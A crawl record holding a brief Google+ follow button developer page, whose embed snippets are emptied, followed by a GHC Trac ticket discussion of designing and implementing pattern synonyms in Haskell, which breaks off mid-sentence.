The Google+ follow button adds a simple, smaller form factor button to your page, which quickly allows visitors to add you or your page to their circles. The minimum code required to render a Google+ follow button on your website is one JavaScript include and the follow button tag, for example:
<script src="" async defer></script> <-- Place this tag where you want the button to render. --> <div class="g-follow" data-</div>
You can also use the custom
<g:follow > tag; however, the HTML5
markup is the recommended approach.
<script src="" async defer></script> <g:follow</g:follow>
Example follow button sizes
For the follow button, you have three choices for the height of your
button:
15,
20, and
24 pixels.
The width of the button is automatically calculated to fit the label
in the user's language.
Tag attributes for the follow button
You can set these parameters as
attribute="value" pairs on the
button tag, or as
key:value pairs in a call to
gapi.follow.render.
If you use HTML5 markup, prefix the attribute names below with
data-, for example:
data-rel="author". follow button JavaScript defines two button-rendering functions under
the
gapi.follow namespace. You must call one of these
functions if you disable automatic rendering by setting
parsetags to
"
explicit".
FAQs
- What data is sent to Google when you click the follow button?
- When a user clicks a Follow button, Google receives information including the URL of the page/profile/community followed, information about the user's Google profile, the user's IP address, and other browser-related information. | https://developers.google.com/+/web/follow/?hl=zh-tw | CC-MAIN-2019-22 | refinedweb | 330 | 57.71 |
Uday Girajavagol1,127 Points
Challenge Error - Task 1 is not passing
I am getting error that task 1 is not passing. What is this error?
import random start = 5 while start: N = random.randint(1,99) if even_odd(N): print("{} is even".format(N)) else: print("{} is odd".format(N)) start=start - 1 def even_odd(num): # If % 2 is 0, the number is even. # Since 0 is falsey, we have to invert it with not. return not num % 2
1 Answer
Jennifer NordellTreehouse Staff
Hi there, Uday! First, you're doing terrific. Your syntax and logic are pretty spot on, but it's your ordering that's a bit off. You were meant to write that
while loop below the definition of the
even_odd function. If you try running your code as it is now, through step 1, you will get back this:
Bummer! name 'even_odd' is not defined
You've run into the most common reason for getting a "Task 1 is no longer passing" and it is due to a syntax error. When this happens, your code can no longer be interpreted at all, thus invalidating all code there.
In this case, you're trying to use the
even_odd function in the
while loop, but that function isn't defined until after the loop. Try moving your
even_odd function back to the top of the file. When I do this, your code passes all steps.
Hope this helps!
Uday Girajavagol1,127 Points
Uday Girajavagol1,127 Points
Jennifer Nordell ...Thanks...I am used to MATLAB....I used ordering pattern like MATLAB....Now I got it...Thanks again.. | https://teamtreehouse.com/community/challenge-error-task-1-is-not-passing | CC-MAIN-2019-39 | refinedweb | 268 | 85.59 |
I'm making a pong game for my software development class, and I should probably state that this is homework, hence my limited understanding. and I'm having some problems creating the AI for my NPC paddle. I'm using Kivy and Python.
Currently I can create impossible to beat AI by doing this:
#ai
self.player2.center_y = self.ball.y
self.player2.center_y
self.ball.y
"Every x seconds, the paddle will move x pixels in the y axis."
def serve_ball(self, vel=(10,0)):
self.ball.center = self.center
self.ball.velocity = vel
vel=(10,0)):
ball.velocity
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0/300.0)
return game
Clock.schedule_interval(game.update, 1.0/300.0)
def AI(self):
self.AI_Speed = self.ball.velocity - 10
self.player1.
Since this is such a big question, I haven't tested this out or anything, but it seems like you want to have some sort of function that moves the AI (I'll call it self.player2.move()). If you call this function in game.update(), then you should be able to move the AI paddle incrementally closer to where it needs to be to hit the ball.
Some basic pseudocode for self.player2.move():
figure out if ball is above or below paddle move self.AI_Speed units in the direction of the ball
You might need to adjust the AI speed more to make this work, but I think it should be the right general idea. If you think about it, the unbeatable AI is basically just infinitely fast.
Does that help get you unstuck? | https://codedump.io/share/SImS19vv4Xw4/1/creating-ai-for-pong-game--basic-understanding-of-speed-algorithm | CC-MAIN-2017-34 | refinedweb | 275 | 67.96 |
GRASS and C++
(page to be expanded)
Calling GRASS library functionality in C++
For working examples, see:
I/O:
Raster data processing
Image processing
Visualization:
Notes
C++ code that use C shared libraries needs to specify this fact to the compiler. This can be defined with the extern "C" keyword, in this way:
#ifdef __cplusplus extern "C" { #endif ... #ifdef __cplusplus } #endif
The C++ compiler will understand that the functions defined in gis.h are coded in C. If it is not specified the linking step will throw an error stating that the symbols for the C functions were not found in the shared library. Without the 'extern "C" ...' qualification, C++ assumes that functions have C++ linkage, meaning that the parameter types are embedded in the symbol name (C++ allows function overloading, where multiple functions can have the same name provided that they have different parameter types). | http://grass.osgeo.org/wiki/GRASS_and_C%2B%2B | crawl-003 | refinedweb | 146 | 50.57 |
The whole thing is about exploiting a stack based buffer overflow vulnerability. We have some application, that has some buffer, and it reads some user-provided data to some too-small buffer (I think I'm abusing some word). The story continues as always - the read data overwrites the stack data that's placed after the buffer. But, we have a few new "rules of engagement":
1. The stack is not executable (the W^X policy, turned on DEP, whatever), and, we are not able to place the shellcode in any other memory area.
2. There are no canaries of death, security cookies, nor any other zoological-culinary solutions.
3. We have accurate information about the libraries in memory, their addresses and versions (and we know exact opcodes that make the library).
4. ASLR (Address Space Layout Randomization, sometimes wrongly called by me Address Space Randomization Layer) is turned off, or predictable (with 100% accuracy) - for example this is a Vista, and we have information about library layout taken after the recent session started.
Since point 1 is in effect, placing the shellcode on the stack is pointless - in the moment EIP would reach it, an beautiful exception will be thrown, and our shellcode will not be executed.
As an answer to the not-executable stack, someone smart (I don't have information on who exactly that was) invented a technique called ret-to-libc, that works by making a chain of calls to the functions from libc (or other libraries) using the stack call/ret mechanism. Thanks to that, the EIP never goes to some not executable memory, however the attacker can redirect it to other useful places.
Return-oriented exploiting is an expansion of the above concept. The main change is that we do not return only to functions, instead, we also return to any code fragments that can be reused by us, and ends with some kind of a return instruction (ret/retn). This allows us to create almost any 'program' by reusing fragments of opcodes that lay in the memory. What's worth noticing, is that we are not restricted to ret/retn places on purpose by the compiler. We can also use the C3 and C2 XX XX that appear in memory as parts of other opcodes, for example let's take the MOV EAX, 0xC3414141 that will be compiled (assembled, whatever) to B8 41 41 41 C3, but, the disassembled instructions depend on the offset on which the disassembly starts:
(offset 0)
B8414141C3 mov eax,0xc3414141
(offset 1)
41 inc ecx
41 inc ecx
41 inc ecx
C3 ret
(offset 2)
41 inc ecx
41 inc ecx
C3 ret
(offset 3)
41 inc ecx
C3 ret
(offset 4)
C3 ret
As one can see, the interpretation of an instruction depends on the place that we call 'the beginning'.
OK, I think I've shown a little what will it all be about. The time has come to present an example program, that will be used as an illustration that will allow us to go deeper into the topic.
The application below is vulnerable to a typical stack-based buffer overflow attack. In the func () function the file sploitme.bin is read to a buffer declared to be the size of 16 bytes. However, in the call to fread function, as the size of the input data is used the size of the file (where it should be the buffer size) - this is where the overflow takes place.
Additionally, in the main() function there is a 16KB local buffer, that is placed there to expand the stack a little (explanation: during my tests the stack became to small, so I had to put the buffer there ;p).
#include <stdio.h>
int
func ()
{
char buf[16];
size_t sz;
FILE *f;
f = fopen ("sploitme.bin", "rb");
if (!f)
return 1;
fseek (f, 0, SEEK_END);
sz = ftell (f);
fseek (f, 0, SEEK_SET);
fread (buf, 1, sz, f); // <=- BO
fclose (f);
return 0;
}
int
main (void)
{
char big_buffer[0x4000] = { 0 };
return func ();
}
So, having this 'bad' example now we must select a quest (with respect to the rules of engagement). My quest will be simple - to write out 'hello world' to stdout, and exit the application properly without all those nasty little exceptions being thrown at the unsuspecting user (I'll talk about shell bind shellcodes and similar stuff during another occasion).
Let's get to work.
Let's start with inventing how this shellcode will work:
1. First, it should place the "hello world" someplace in the memory (some mov [address], "hell", etc)
2. It should call puts, or a similar function, with the above string address (push+call)
3. It should call ExitProcess, or a similar function (push+call)
Using the ret-to-anything technique the simplest things to do will be the function calls - you just have to place the function address on the stack, the arguments after it, and thats it.
However placing the "hello world" string may not be as simple (let's assume that we cannot place it on the stack, because the stack address is unpredictable). To figure out how to do that, we need to see what we can use - so let's scan the process memory for byte sequences that end with C3 or C2 (let's look in the executable area only). To do that, we need to create a scanner, that will write out the possibilities that we possess.
A sample scanner is placed below - you provide him with a raw memory dump file (for example a .mem file without any headers, just like the one OllyDbg make) - the file has to be named in this convention: something_ADDRESS.mem, i.e. something_1234ABCD.mem. Btw, if someone asks me who coded the below, I'm going to lie that it wasn't me ;p (it's as always awful... for example, instead of using diStorm or sth, I'm calling ndisasm using system ()... it's bad... I really have to start publishing good coded examples... well, but this way readers will learn how NOT to write ;p).
#include <gynlibs.cpp>
LONG_MAIN (argc,argv)
{
CHECK_ARGS(2, "usage: get_opcodes <filename_offset.mem>");
size_t sz, i, j;
unsigned char *data;
unsigned int offset;
data = FileGetContent (argv[1], &sz);
CHECK_FILEGET_DIE(argv[1], data);
sscanf (argv[1], "%*[^_]_%x", &offset);
printf ("using offset: %.8x\n", offset); fflush (stdout);
for (i = 1; i < sz; i++)
{
size_t maxdata = (i >= 10) ? 10 : i;
if ((i % 100) == 0)
fprintf (stderr, "%.8x / %.8x\r", i, sz);
if (data[i] == 0xC3 || data[i] == 0xC2) // ret
{
j = i - maxdata;
for (; j < i; j++, maxdata--)
{
FileSetContent ("__tmp.bin", &data[j], maxdata + 1 + (data[i] == 0xC2) * 2);
system ("ndisasm -b 32 __tmp.bin > __tmp.dis"); fflush (stdout); //lame lame, but works
unsigned char *dis_data;
size_t dis_sz;
dis_data = FileGetContentAsText ("__tmp.dis", &dis_sz);
if (!dis_data)
continue;
dis_data[dis_sz-1] = '\0'; // cheat, overwrite the last \0
if (!strstr ((char*)dis_data, "ret"))
continue;
printf ("-----> Offset: %.8x\n", offset + j);
puts ((char*)dis_data);
puts (""); fflush (stdout);
}
continue;
}
}
delete data;
return 0;
}
The above "ingeniously" written program takes 3 hours to scan 2MB of memory lol (hehe OK OK, I'll rewrite it later and throw it on my blog). The program requires the recent gynlibs.
Using the above scanner, I've scanned the executable sections of kernel32.dll, msvcrt.dll, ntdll.dll and sploitme.exe (using the script shown below):
@echo off
for %%i in (*.mem) do (
echo Processing %%i...
get_opcodes %%i >> ret_list.txt
)
echo Done.
As a result, I've got an 18MB text files with many different sequences (each disassembled using a few different starting points).
It's a good idea to move a step away from the black board at this time, and try to look at these opcode sequences as single instructions that are coded in some nanocode (term microcode is already used ;p) - each sequence is from now a single building block for us - and we will try to put the shellcode together using these building blocks. We will also treat the virtual address of the sequence as the instruction opcode. To distinguish the return-to-anything opcodes/instructions from the assembly/CPU opcodes/instructions, I'll call the former RTA opcodes and RTA instructions (RTA as in Return To Anything), and the later CPU opcodes and CPU instructions (I figured that calling them X86 opcodes/instructions would be too narrowing - since this technique is also usable on other architectures).
Let's get back to the main task - writing the hello-string to the memory. It's a good idea to grep (is that even a verb? hmm, I'm using it, so I guess it is ;p) the list for expressions like "mov [".
19:35:57 gynvael >cat ret_list.txt | grep -c "mov \["
3622
A lot. Lets narrow the search, to "mov [32-bit reg]".
19:38:11 gynvael >cat ret_list.txt | grep -c "mov \[e[a-z]\{2\}\]"
1627
Better, but still a lot. Let's say we will want to use something like "mov [32-bit reg], 32-bit reg":
19:38:21 gynvael >cat ret_list.txt | grep -c "mov \[e[a-z]\{2\}\],e[a-z]\{2\}"
1308
Cool. Now let's look on the list (my list is available for download at the bottom of the post, but I encourage the reader to create his own list and retrace my steps) and pick some "mov [esi], edi" or something (the address is taken from Vista with ASLR, so think about it only as an example):
-----> Offset: 76cfe865
00000000 8937 mov [edi],esi
00000002 B001 mov al,0x1
00000004 5F pop edi
00000005 5E pop esi
00000006 5D pop ebp
00000007 C20C00 ret 0xc
Oh. Cool. It's just as we wanted, a mov [edi],esi. And, in addition, we got a way to insert our value to edi and esi - pop edi and pop esi (remember that all ur stack r belong to us).
So, having the above CPU code sequence, we can use it as two different RTA instructions: first at 76cfe869 - it could be used to place a value from the stack in edi and esi regs, and the second at 76cfe865 - that an be used to write a DWORD into the memory.
One must notice one thing, that is pretty common in this technique - side effects. In the above sequence, there are three side effects:
- value of 1 will be places in AL registry
- three DWORDs will be taken from the stack, and placed in 3 registers - EDI, ESI, EBP (when considering the 'set EDI and ESI' RTA instruction, only the EBP overwrite is considered as a side effect, but when thinking about 'place a EDI on [ESI]' RTA instruction, then all three popped values are considered to be side effects)
- after the return, the stack will move 12 btyes (ret 0xc CPU instruction)
The first side-effect we can easily ignore. However, in case of the two following ones, we must react in a way to balance them. It's quite simple actually, we just need to prepare more data on the stack (some randome/trash bytes will do) and remember that EDI/ESI/EBP values will be destroyed.
Having the above RTA instructions, we can create a POKE (just like the old 8-bit times) function, that will place a provided DWORD at the provided memory location. The internals of this function looks like this:
One row of colorful rectangles in a row is a fragment of the stack, that makes one RTA instruction invoction. Additionally, I've marked on the image what on the stack is used by what nanocode CPU instruction. As for the color meaning: the lemon cadmium rectangles are important parameters, the slate violet ones are just trash/filling/align/unused DWORDs, and the mild ultramarine are the return addresses - or to call them in the current notation, the RTA opcodes.
As one can see on the image, even if I use only two RTA instructions to construct the POKE functions, there are four RTA opcodes. This is made this way due to the need of stack synchronizing, which is required because of the side-effect of the retn 0xc CPU instruction. To balance this side-effect, I provide the address (RTA opcode) of a single ret instruction, so that when the EIP executes retn 0xc, it will just to the single ret CPU opcode, add 0xC to ESP, and execute that single ret, that will take the next value from the stack that lies after the current RTA instruction invocation is finished - and at the beginning of the next one (I'm having trouble to explain it in more simple words, I hope you'll understand why this is needed and how does it work).
So, we have a POKE function, that takes 16 DWORD on the stack. No we just use it 3 times to place the "hell" "o wo", "rld\0" opcodes anywhere in the memory we like.
The next thing is the call to puts and ExitProcess. These RTA instructions will be simpler - you just have to insert the puts address, and then some return address, and then the function parameter. However, one must remember that since puts is cdecl, the caller must remove the parameter from the stack - so that our next RTA instructions will have the stack 'synchronized'. To do this, we just have to call some pop+ret sequence after puts. I've choose the following sequence:
-----> Offset: 76cf08f2
00000000 5D pop ebp
00000001 C20400 ret 0x4
Solving one problem (the pop ebp will remove the puts parameter - remember about side effects!) creates another - retn 0x4. But, It's easily solvable using the same trick as in POKE - just jump to some lone ret and place some DWORD trash on the stack, and thats that.
In case of the ExitProcess function we do not have to worry about the function returning, stack sync, etc, for obvious reasons ;>
OK, so we have all we need. Now let's write a C++ app that will put the exploit together.
The base of the program will be a insert_dword function, that writes a single DWORD to the sploitme.bin file. Using this instruction we can form a POKE function (split to two RTA instructions), and INVOKE_PUTS and INVOKE_EXITPROCESS RTA instructions. And then, we can use these functions to form an exploit (a link to the source is at the bottom of the post).
FILE *f = fopen ("sploitme.bin", "wb");
if (!f)
return 1;
// Overflow the buffer
fwrite ("............................", 1, 28, f);
// Write 0x41424344 to 00
poke_dword (f, 0x402400, *(unsigned int*)"hell");
poke_dword (f, 0x402404, *(unsigned int*)"o wo");
poke_dword (f, 0x402408, *(unsigned int*)"rld\0");
invoke_puts (f, 0x402400);
invoke_ExitProcess (f, 0);
// Done
fclose (f);
The POKE implementation looks like this:
void
set_edi_esi_ebp (FILE *f, unsigned int edi, unsigned int esi, unsigned int ebp)
{
insert_dword (f, ADDR
mov_esi_to_edi_set_edi_esi_ebp (FILE *f, unsigned int edi, unsigned int esi, unsigned ebp)
{
insert_dword (f, ADDR_MOV_EDI_ESI
poke_dword (FILE *f, unsigned int addr, unsigned int dw)
{
set_edi_esi_ebp (f, addr, dw, 0xdeaddead);
mov_esi_to_edi_set_edi_esi_ebp (f, 0xdeaddead, 0xdeaddead, 0xdeaddead);
}
The INVOKE_ RTA instructions are far shorter:
void
invoke_puts (FILE *f, unsigned int addr)
{
insert_dword (f, FUNC_PUTS);
insert_dword (f, ADDR_POP_EBP_RET_4);
insert_dword (f, addr);
insert_dword (f, ADDR_RET);
insert_dword (f, 0xdeaddead);
}
void
invoke_ExitProcess (FILE *f, unsigned int code)
{
insert_dword (f, FUNC_EXITPROCESS);
insert_dword (f, 0xdeaddead);
insert_dword (f, code);
}
The final exploit design looks like this:
The funny thing is... this works ;>
A few last remarks:
1. All the above addresses are the ones I've had in my current ASLR session (wonder if this information can be used for some evil purpose ;p), so I advise the reader to search for the required sequences on his own machine.
2. It's a good thing to make notes about the stack. Then the stack is the main axis of execution, and it's (ESP) changed by all these POPs, RETs and RETNs, one may easily mix stuff up.
3. This can be used to create a pretty decent shellcode language. Some SHELLCODE BASIC or sth.
4. Loops, ifs etc are also possible, I'll write about them some other time.
The package (source + sequence list): ret_ro_exploit.zip (1.5MB)
Thats it for today.
P.S. Two links worth reading - they link to the Hovav Shachams research, he has talked about this on the BlackHat last year:
The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)
Return-Oriented Programming: Exploits Without Code Injection
Thanks for sharing, mate!
Add a comment: | https://gynvael.coldwind.pl/?id=149&lang=en | CC-MAIN-2021-25 | refinedweb | 2,756 | 65.76 |
Can you explain a little more about what you are trying to accomplish? What type of objects are you trying to edit?
You may want to look into using block types to define a set of properties (), though I don't know if that solves what you are trying to accomplish.
I think he is looking for multiple property control which is similar to EPiServer MultipleProperty
I would like to edit collection of simple objects, for example:
public class Item { public int Id { get; set; } public string Name { get; set; } public bool Enabled { get; set; } }
Or more complex:
public class Item { public int Id { get; set; } public string Name { get; set; } public bool Enabled { get; set; } public LinkItemCollection Links { get; set; } public ContentArea Items { get; set; } public Url Image { get; set; } [Required] public string Description { get; set; } }
Solution with blocks is working, but is not useful, because it takes more time to create each additional item and blocks, located in folders, and their amount grows up.
I found in episerver sources CollectionEditorDescriptor and CollectionEditor.js. When I try to mark page property with [EditorDescriptor(EditorDescriptorType = typeof(CollectionEditorDescriptor<Item>))] it renders good CollectionEditor control, but without column captions and it doesn't save data. It would be great to use this out of the box solution.
I believe a contentarea with blocks is still a way to go.
It bothered me as well the process of creating a block and drag&dropping it to the content area. However, with the new shortcut button that came with 7.5, inside the content area, named "You can drop content here, or create a new block", it gets really neat.
When you click on "create a new block", you get all the properties listed + the block gets saved to current page blocks, under "For this page".
As for the amount of them, it should be that these current-page blocks get deleted when the page gets deleted. As for the blocks shared among the pages, you could create a cleanup scheduled job that deletes them if no pages reference it.
If you're not finding any solutions that work for you, you might just want to look into creating your own custom EPiServer property with Dojo.
You should be able to get a good idea about what's involved in making a property that works for your situation.
Hello everyone!
Maybe anybody knows how I can edit collection of complex objects in episerver edit UI? | https://world.episerver.com/forum/developer-forum/-Episerver-75-CMS/Thread-Container/2014/5/Editing-collection-of-complex-objects/ | CC-MAIN-2020-16 | refinedweb | 411 | 64.54 |
Inheritence
————-
TailList is a subclass of SList.
SList is the superclass of TailList.
A subclass can modify a superclass in three different ways:
1. It can declare new fields.
2. It can declare new methods.
3. It can override old methods with new implementations. It is not necessary to orverride all.
public class TailList extends SList{ // the head and size is inherited private SListNode tail; // override the insertEnd method public void insertEnd(Object obj){ // solution } }
Inheritence and Constructors
——————————–
Java executes the TailList constructor, but first it executes SList() constructor.
public TailList(){ //SList constructor is called //additional Tail = null; }
Zero parameter constructor is called by default. To change:
public TailList(int x){ super(x); // calls the super class constructor and must be executed FIRST. tail = null; }
Invoking overridden methods
——————————-
public void insertFront(Object obj){ super.insertFront(obj); // for the superclass and not necessarly the first line. if(size == 1){ tail = head; } }
The “protected” keyword
—————————-
public class SList{ protected SListNode head; protected int size; }
Both “protected ” field and method is visible to the declaring class and to all its subclasses.
In contrast, “private ” fields are not visible to subclasses.
Dynamic method lookup
————————
For Java “Every TailList is an SList”.
SList s = new TailList(); // TailList is a subclass of SList and SList is not abstract s.insertFront(obj);
Abstract class
—————-
A class whose sole purpose it to be inherited. This is an ADT. An abstract method lacks the implementation.
public abstract class List{ protected int size; public int lenght(){ return size; } public abstract void insertFront(Object obj); } List mylist; mylist = new List(); //compile time error
A non abstract class may never
1. contain an abstract method.
2. inherit one without providing an implementation.
List mylist = new SList(); // correct! mylist.insertFront(obj);
One list sorter can sort every kind of list.
public void listSort(List l){ //code }
Subclasses of List: SList, DList,TailList
TimedList: record amount of time doint list operations
TransactionList: Logs all the changes on a disk for power outage. | https://linuxjunkies.wordpress.com/tag/data/ | CC-MAIN-2018-34 | refinedweb | 328 | 58.69 |
Opened 6 years ago
Closed 4 years ago
Last modified 20 months ago
#5144 closed feature request (fixed)
Pattern synonyms
Description
Lennart would like pattern synonyms. Something like
pattern con var1 … varN = pat
where ‘pattern` is a new keyword.
- Perhaps there should be a way to give a type as well, so the
concould be
(con :: type).
- The
rhsis type checked as a usual pattern, i.e., in the global environment.
- The
patshould bind exactly
var1..
varN.
- Recursive pattern synonyms are not allowed.
With
con in scope it can be used like any other constructor in a pattern, and the semantics is simply by expansion.
It would have been very nice if
con could be used in expressions as well, but I don’t see how that could work with view patterns.
Perhaps view patterns could be extended to make them bidirectional.
My rationale for wanting pattern synonyms is that I sometimes have pattern matching with a lot of complex repetition in them. I’ve even resorted to using CPP in the past, and that just shows that Haskell is lacking some abstraction mechanism.
If pattern synonyms could be made to work in the presence of view pattern it would offer a mechanism for normal pattern matching on abstract types, since the abstract type could export some pattern synonyms and you’d not be able to tell of those were real constructors or not.
I’ve not tried implementing this, but I think SHE has something like it.
Change History (51)
comment:1 Changed 6 years ago by
comment:2 Changed 6 years ago by
I've been thinking about how to design this extension to get the most bang for the buck. Here's a slightly different proposal that I think has some nice properties, and is still quite simple.
Pattern synonyms define new varids rather than conids.
For example, we could add this to
Data.Sequence:
pattern empty = t | Nothing2 <- viewLTree t pattern x <| xs = t | Just (x,xs) <- viewLTree t pattern xs |> x = t | Just (x,xs) <- viewRTree t
which would subsume all the existing
ViewL/
ViewR stuff. Note that
the pattern right hand side may include a pattern guard (or view
patterns).
The big win here is that you can use the same varid as an existing function function, so you get to define both constructors and destructors, and they look identical. Furthermore you get pattern matching (view-style) on abstract types.
You could do this with conids instead of varids if there was also some way to define the expression form - that's the tricky part, which is why I thought varids would be a better choice. Also varid patterns give you a clue that something magic is going on, but in a nicer way than view patterns.
Not many changes to Haddock etc. would be required (I think if we used conids it would be a bit trickier: should they be indistinguishable from ordinary datatypes or not?)
A design question is whether the pattern should be required to have the same type as the function, if both exist. There could be all sorts of hairy issues there. If they aren't the same, can you give a type signature to a pattern?
This extension to pattern synonyms covers all the use cases of view
patterns in which there is a single identifier to the left of the
arrow (which is about 90% of the examples in ViewPatterns). Perhaps
there's some way to extend this to allow passing arguments from the
pattern site too... it's just a syntax question (but a gnarly one). So while with view
patterns you can define an n+k pattern, with pattern synonyms it has
to be restricted to a particular
k:
pattern oneplus n = m | m > 0, let n = m - 1 f 0 = ... f (oneplus n) = ...
I do think for the cases where pattern synonyms apply, the syntax is much nicer than view patterns. In particular, there's no need for intermediate Maybes or tuples, which the view pattern proposal suggests to make implicit.
Another one:
pattern x `and` y = it | x <- it, y <- it
(this was called
both in ViewPatterns).
In conclusion: I'm not sure whether this is the right thing, but from certain angles it looks very attractive. Thoughts?
comment:3 follow-up: 4 Changed 6 years ago by
I'm not sure I follow exactly what you're proposing. What does
pattern x `and` y = it | x <- it, y <- it
mean exactly? And how would you use it? Could you use it to require an argument matches both
(Just x, _) and
(_, True), or am I on completely the wrong track?
comment:4 Changed 6 years ago by
comment:5 Changed 6 years ago by
There's a start of a wiki page at.
comment:6 Changed 5 years ago by
It occurs to me that for great symmetry you could call these data synonyms (data synonyms : data constructors :: type synonyms : type constructors). Unfortunately the 'data' keyword is taken.. :-)
comment:7 Changed 5 years ago by
Any news on this? It would be very nice to have these.
comment:8 Changed 5 years ago by
comment:9 Changed 5 years ago by
I'm afraid not. I'm deep under water with other stuff (including GHC stuff), and this feature is relatively ambitious, both on the design side and implementation. It might make a good intern project!
Simon
comment:10 follow-up: 12 Changed 4 years ago by
I've started working on this, and I have the simplest case (pattern-only synonyms) almost working, with most of the groundwork done for simple bidirectional pattern synonyms as well.
What's the correct protocol in this case? Should I mark myself as the owner on this ticket until I have my patches ready for submission for review? Or only after an initial working version is accepted?
comment:11 Changed 4 years ago by
comment:12 Changed 4 years ago by
Great to hear that you're working on this! Just out of interest, are you implementing ViewPatternsAlternative too? Pattern synonyms become rather powerful when you can use pattern guards inside them, which is what ViewPatternsAlternative lets you do.
What's the correct protocol in this case? Should I mark myself as the owner on this ticket until I have my patches ready for submission for review? Or only after an initial working version is accepted?
You can assign the ticket to yourself if you're working on it, yes.
comment:13 Changed 4 years ago by
comment:14 Changed 4 years ago by
comment:15 Changed 4 years ago by
Progress update:
Code is in the
pattern-synonyms branch at Until I am ready to submit for initial review, I will do all kinds of funky rebasing and history rewriting, so use it for read-only snapshots as of now.
Using the names from the wiki link, pattern-only pattern synonyms and simple pattern synonyms now (mostly) work. There's a bug in the typing of pattern-synonyms-as-expressions, so e.g. with the following program:
{-# LANGUAGE PatternSynonyms #-} pattern One x = [x] singleton :: a -> [a] singleton x = One x
I get an error that the type of
One is too rigid; I expect this to be easy to fix:
Couldn't match type ‛t0’ with ‛a’ because type variable ‛a’ would escape its scope This (rigid, skolem) type variable is bound by the type signature for singleton :: a -> [a] at /tmp/PatSyn.hs:18:14-21 Expected type: [a] Actual type: [t0]
The one big missing feature is exporting pattern synonyms. First of all, since pattern synonyms are in the namespace of constructors, not types, we need special syntax to export them; I propose the following:
module M (pattern P) where pattern P x = _:_:x:_
(note that you can have a type called
P as well, but you'd get a clash if you had a constructor with that name).
To be honest, I have no idea yet how to actually implement exporting, since I haven't looked at that part of GHC yet -- any pointers are appreciated.
After I've fixed the bug mentioned and implemented exporting, I'll do a formal submission of my (clean-up) patch for review.
After that baseline, the 'bidirectional pattern synonyms' proposal from the wiki page should fit right into it as well. I have no opinion yet how difficult adding associated patsyns will be, I'll need to do more research first.
comment:16 Changed 4 years ago by
Progress update: the following module demonstrates all the features implemented so far:
{-# LANGUAGE PatternSynonyms #-} module PatSyn where -- The example from the wiki page data Type = App String [Type] deriving Show pattern Arrow t1 t2 = App "->" [t1, t2] pattern Int = App "Int" [] collectArgs :: Type -> [Type] collectArgs (Arrow t1 t2) = t1 : collectArgs t2 collectArgs _ = [] isInt Int = True isInt _ = False arrows :: [Type] -> Type -> Type arrows = flip $ foldr Arrow -- Simple pattern synonyms pattern Nil = [] pattern Cons x xs = x:xs zip' :: [a] -> [b] -> [(a, b)] zip' (Cons x xs) (Cons y ys) = Cons (x, y) (zip' xs ys) zip' Nil _ = Nil zip' _ Nil = Nil pattern One x = [x] one :: [a] -> Maybe a one (One x) = Just x one _ = Nothing singleton :: a -> [a] singleton x = One x -- Pattern only synonyms pattern Third x = _:_:x:_ third :: [a] -> Maybe a third (Third x) = Just x third _ = Nothing -- This causes a type error: invalid x = Third x -- PatSyn.hs:30:13: -- Third used in an expression, but it's a non-bidirectional pattern synonym -- In the expression: Third x -- In an equation for ‛invalid’: invalid x = Third x -- Failed, modules loaded: none.
The following module also works, but demonstrates the clunkiness caused by the lack of infix pattern synonyms:
{-# LANGUAGE ViewPatterns, PatternSynonyms #-} import qualified Data.Sequence as Seq pattern Empty = (Seq.viewl -> Seq.EmptyL) pattern Cons x xs = (Seq.viewl -> x Seq.:< xs) pattern Snoc xs x = (Seq.viewr -> xs Seq.:> x) zipZag :: Seq.Seq a -> Seq.Seq b -> Seq.Seq (a, b) zipZag (Cons x xs) (Snoc ys y) = (x, y) Seq.<| zipZag xs ys zipZag _ _ = Seq.empty
Of course, implementing infix pattern synonyms should be easy.
Still missing: exporting of pattern synonyms.
comment:17 Changed 4 years ago by
comment:18 Changed 4 years ago by
I've implemented infix notation as well, so now you can write this:
{-# LANGUAGE ViewPatterns, PatternSynonyms #-} import qualified Data.Sequence as Seq pattern Empty = (Seq.viewl -> Seq.EmptyL) pattern x :< xs = (Seq.viewl -> x Seq.:< xs) pattern xs :> x = (Seq.viewr -> xs Seq.:> x) zipZag :: Seq.Seq a -> Seq.Seq b -> Seq.Seq (a, b) zipZag (x :< xs) (ys :> y) = (x, y) Seq.<| zipZag xs ys zipZag _ _ = Seq.empty
comment:19 Changed 4 years ago by
Fabulous! Köszönöm!
Deplorable syntax bikeshedding:
Perhaps, instead of
pattern,
data alias? I feel that would be more accurate and descriptive for many cases (when the synonym can also be used on the RHS), though possibly less so for others (pattern-only synonyms). It might also avoid having to reserve a keyword. (As with
TypeFamilies, as far as I can tell, "family" is not a keyword. I don't think it's possible to avoid the keyword with a new top-level entity like
pattern, but maybe I'm mistaken?)
comment:20 Changed 4 years ago by
Exports now work with the following syntax:
module Foo (pattern P) where pattern P x y = (x, y, 42)
This exports
P both as a pattern and as an expression (if it's bidirectional, like in the case here)
The extra
pattern keyword is needed because pattern names live in the constructor namespace, so it's perfectly valid to have
data P = C pattern P = ()
(due to entirely non-interesting reasons, the implementation of exporting is not yet pushed to)
Remaining work to do:
- Sort out recursive pattern definitions. Currently these are rejected implicitly by an internal GHC error, not exactly ideal... also, non-recursive usages of pattern synonyms mentioning each other don't work, but I see no reason why we wouldn't want to allow it:
pattern P1 = P2 pattern P2 = ()
- The typechecker for pattern synonym definitions is wrong: it returns monomorphic types (e.g. for
pattern Head x = x:_, it infers type
t -> [t]instead of
forall a. a -> [a]. This is worked around by a horrible hack when typechecking pattern synonym usages in patterns. Richard Eisenberg and Simon Peyton Jones have already offered to help with this.
comment:21 Changed 4 years ago by
We need to think about the import/export situation. One of the goals of pattern synonyms is to abstract constructors, so that a library can change a data type representation while allowing clients to continue to use pattern matching. Clearly we can't use the
T(P1,P2,..) syntax for exporting patterns (what is
T?), but perhaps we can use the
pattern syntax for exporting constructors. I haven't thought about this very hard.
When a pattern is imported, can it be used in an expression? Does the client know whether it can be used in an expression or not?
What do the Haddock docs for pattern synonyms look like?
comment:22 Changed 4 years ago by
If your question is whether there's a syntactic way to see if a given pattern synonym import can be used as an expression, then no, not at the moment. So if you do something like
import M(pattern P) x = P
then the only error you will get if
P is not bidirectional is from the type checker:
/tmp/hs/M2.hs:5:5: P used in an expression, but it's a non-bidirectional pattern synonym In the expression: P In an equation for ‛x’: x = P
comment:23 follow-up: 25 Changed 4 years ago by
We must treat data constructors uniformly with pattern synonyms. For example, it should definitely be OK to have
